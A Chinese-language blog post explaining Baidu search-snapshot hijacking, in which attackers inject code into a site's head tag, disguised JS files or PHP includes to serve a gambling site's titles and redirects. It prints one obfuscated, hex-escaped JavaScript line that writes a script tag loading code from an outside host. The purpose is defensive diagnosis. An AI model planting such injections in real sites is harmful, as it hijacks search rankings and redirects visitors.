近段時(shí)間朋友裝修站經(jīng)常有些莫名其妙的搜索關(guān)鍵詞來(lái)到網(wǎng)站，第一感覺(jué)就是被人攻擊了，但也看不出有什么異樣，只是在快照上有顯示主域名的標(biāo)題卻是另外的菠菜站。由此初步懷疑是百度快照劫持，首先了解下什么是快照劫持。

       百度快照劫持就是黑客通過(guò)技術(shù)手段拿到你網(wǎng)站FTP權(quán)限或者數(shù)據(jù)庫(kù)權(quán)限植入代碼或添加劫持腳本，把他想要的內(nèi)容寫(xiě)進(jìn)一個(gè)頁(yè)面代碼里，在首頁(yè)Head標(biāo)簽下調(diào)用，當(dāng)搜索引擎訪問(wèn)你網(wǎng)站的時(shí)候抓取到你網(wǎng)站的標(biāo)題-關(guān)鍵詞-描述的時(shí)候，就會(huì)抓取到黑客設(shè)定的任何內(nèi)容！

       一般用site命令查看百度快照情況，如

site:vi586.com

       如果看到和你寫(xiě)的標(biāo)題、描述不一樣，就可以判斷是黑客對(duì)快照進(jìn)行劫持。了解常見(jiàn)的劫持方法，防患于未然，保障網(wǎng)站安全。

       從上面的截圖看來(lái)中標(biāo)的不在少數(shù)哇，點(diǎn)擊“百度快照”查看快照信息，標(biāo)題、描述、關(guān)鍵詞都正常，時(shí)間也是較新的。嘗試投訴快照，情況依舊，就給百度反應(yīng)情況，還在等待回復(fù)中。

       除了找百度解決問(wèn)題之前，還需要對(duì)自己的網(wǎng)站進(jìn)行查找、修復(fù)等操作，以免再次受到攻擊。

一 放到<head>標(biāo)簽

       網(wǎng)站設(shè)計(jì)中<head>標(biāo)簽里面有標(biāo)題、描述、關(guān)鍵詞等內(nèi)容，這部分是明顯寫(xiě)上去的，如果是寫(xiě)到生成后的靜態(tài)首頁(yè)html文件里，每次更新首頁(yè)都會(huì)消失。但如果不久后又被修改了，就有可能是通過(guò)其他木馬定時(shí)修改的，要注意找出來(lái)。

       以DedeCMS為例，有些文件夾是禁止執(zhí)行腳本的，所以能修改你的文件肯定在能執(zhí)行的文件夾內(nèi)，如果對(duì)文件結(jié)構(gòu)不是很熟悉的，可以和官方的文件夾進(jìn)行對(duì)比就能找出問(wèn)題所在。

二 偽裝JS文件、修改PHP文件

       這個(gè)我們你一定經(jīng)歷過(guò)，比如DedeCMS的版權(quán)信息，如果你用{dede:global.cfg_poweby/}，后面都會(huì)加上自帶的織夢(mèng)鏈接；下載的模板會(huì)在友情鏈接里面加入模板開(kāi)發(fā)者的友情鏈接，這些鏈接是在模板里面看不到的，每次刷新位置都不一樣。

       需要注意的是，瀏覽器并不識(shí)別JS腳本，如果用JS的方式插入鏈接，在查看源代碼里面是完全看不到具體內(nèi)容的。其實(shí)這個(gè)方法也并不高級(jí)，常見(jiàn)的如：

<script src="../include/js/jq.js" language="javascript" type="text/javascript"></script>

       該js文件里面有類(lèi)似這樣的代碼：

var _$=["\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x77\x77\x77\x2e\x77\x7a\x62\x33\x36\x30\x2e\x74\x6b\/\x69\x6d\x61\x67\x65\x2e\x67\x69\x66\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e"];

document.writeln(_$[0]);

       第一句是通過(guò)加密的代碼，第二句輸出內(nèi)容，一般服務(wù)器做特殊處理，才能輸出正確的內(nèi)容，所以應(yīng)該還有一些PHP文件。

       PHP有許多包含的寫(xiě)法，比如/include文件夾，在核心的PHP文件里面加入劫持代碼，神不知鬼不覺(jué)。

       上面的方法都是比較常見(jiàn)的，一般的CMS有一定的防護(hù)能力，只要自己的數(shù)據(jù)庫(kù)、服務(wù)器密碼不泄露，這些都能及時(shí)解決。

三 你已經(jīng)成為黑客的“肉雞”

       “肉雞”可能很多人不太理解，說(shuō)白了，服務(wù)器、數(shù)據(jù)庫(kù)已經(jīng)被黑客拿到了，或者說(shuō)獲得修改權(quán)限。

       百度有主動(dòng)提交（投訴）快照的功能，黑客可以在晚上無(wú)人值守的時(shí)候偷偷修改模板文件，生成主頁(yè)后向百度提交URL，然后再回復(fù)成原來(lái)的樣子。

快照劫持總結(jié)

       黑客通過(guò)快照劫持代碼能實(shí)現(xiàn)百度快照劫持，是黑帽SEO比較早的技術(shù)，通過(guò)劫持webshell網(wǎng)站，實(shí)現(xiàn)自己的網(wǎng)站排名，主要功能是改變webshell網(wǎng)站的快照，使其快照顯示為你設(shè)置的快照，這個(gè)時(shí)候?qū)Ψ降木W(wǎng)站快照(包括標(biāo)題，關(guān)鍵字，描述都變成你的)。

       代碼通過(guò)實(shí)現(xiàn)快照變成你的，當(dāng)然排名也變成你的，通過(guò)內(nèi)置的跳轉(zhuǎn)代碼，每次通過(guò)搜索引擎點(diǎn)進(jìn)去，網(wǎng)站就會(huì)跳轉(zhuǎn)到其他網(wǎng)站。這就是百度快照劫持的原理，以及更高級(jí)的301權(quán)重劫持手法！